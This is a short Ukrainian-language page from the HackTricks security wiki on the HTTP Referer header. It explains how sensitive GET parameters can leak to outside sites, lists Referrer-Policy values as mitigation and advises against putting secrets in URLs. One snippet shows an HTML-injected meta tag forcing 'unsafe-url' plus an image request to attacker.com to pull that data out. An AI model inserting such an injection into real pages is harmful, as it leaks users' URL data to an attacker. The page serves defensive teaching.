Interesting HTTP

Вивчайте та практикуйте взлом AWS: Навчання HackTricks AWS Red Team Expert (ARTE) Вивчайте та практикуйте взлом GCP: Навчання HackTricks GCP Red Team Expert (GRTE)

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
Поширюйте хакерські трюки, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.

Заголовки реферерів та політика

Реферер - це заголовок, який використовується браузерами для вказівки на те, яка була попередня відвідана сторінка.

Витік чутливої інформації

Якщо на веб-сторінці в який-небудь момент знаходиться чутлива інформація в параметрах запиту GET, якщо сторінка містить посилання на зовнішні джерела або зловмисник може зробити/запропонувати (соціальний інжиніринг) користувачеві відвідати URL, котрим керує зловмисник. Це може дозволити витягти чутливу інформацію з останнього запиту GET.

Пом'якшення

Ви можете змусити браузер дотримуватися політики реферера, яка може запобігти відправці чутливої інформації іншим веб-додаткам:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Протидія контролю

Ви можете перевизначити це правило, використовуючи HTML мета-тег (зловмисник повинен використовувати HTML ін'єкцію):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Захист

Ніколи не розміщуйте будь-які чутливі дані всередині параметрів GET або шляхів в URL-адресі.

PreviousOther Web Tricks NextAndroid Forensics

Last updated 4 months ago